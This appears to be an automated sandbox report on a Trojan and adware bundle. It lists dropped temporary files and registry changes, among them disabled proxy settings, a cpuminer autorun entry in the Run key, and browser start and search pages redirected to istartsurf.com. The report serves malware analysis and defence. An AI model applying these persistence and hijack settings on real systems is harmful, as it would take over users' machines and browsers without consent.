C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE (6223 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS (5796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)

Registry activity

The process ProtectService.exe:3580 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "pcm"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process ProtectService.exe:3668 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"

The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "C4 83 39 63 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process ProtectWindowsManager.exe:3736 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "7D 6C C9 96 9A 83 D0 01"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process ProtectWindowsManager.exe:3316 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\eventlog\Application\WindowsMangerProtect]
"EventMessageFile" = "C:\ProgramData\WindowsMangerPro￿Â"
"TypesSupported" = "7"

The process 15094FED_stp.EXE:3668 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"Publisher" = "DesprotetorINC"
"DisplayVersion" = "1.0"
"DisplayName" = "DesProtetor"

[HKLM\SOFTWARE\DesProtetor]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"UninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
"Comments" = "Tenha acesso direto aos links sem passar por nenhum protetor de Links ou publicidades"
"QuietUninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"

The process cpuminer-x11opt-setup.exe:3752 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"InstallLocation" = "C:\Windows\system32"
"DisplayName" = "CPU Miner"
"Publisher" = "Open Source"

"DisplayIcon" = "C:\Windows\system32\cpuminer-gw64.exe"
"EstimatedSize" = "1316"
"DisplayVersion" = "1.1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"

The process DesProtetor.exe:4032 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "13 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process wpm_v20.0.0.2227.exe:3268 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\supWindowsMangerProtect]
"ptid" = "pcm"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayVersion" = "1.2.0"
"DisplayName" = "ActSys"

[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Publisher" = "NINJASOFT LLC"
"QuietUninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: CWxGaP3QbYgwfMaFKJSDGrZa)"

The process QQBrowser.exe:3824 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process QQBrowser.exe:3212 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Mozilla\Extends]
"AppID" = "quick_searchff@gmail.com"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"Publisher" = "istartsurf"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"
"Time" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKCU\Software\Mozilla\Extends]
"UID" = "535559167_198339_B48A115F"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
"DisplayName" = "istartsurf"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKCU\Software\Mozilla\Extends]
"ptid" = "pcm"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayName" = "istartsurf uninstall"

[HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions]
"quick_searchff@gmail.com" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\quick_searchff@gmail.com"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe -ptid=pcm"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"UninstallString" = "%Program Files% (x86)\WNet\uninst.exe"

[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: aGf9F1GWmcyPdxOIFdIm7cfc)"
"QuietUninstallString" = "%Program Files% (x86)\WNet\uninst.exe"
"DisplayVersion" = "1.0"

The process %original file name%.exe:1512 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "35 BC BD 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

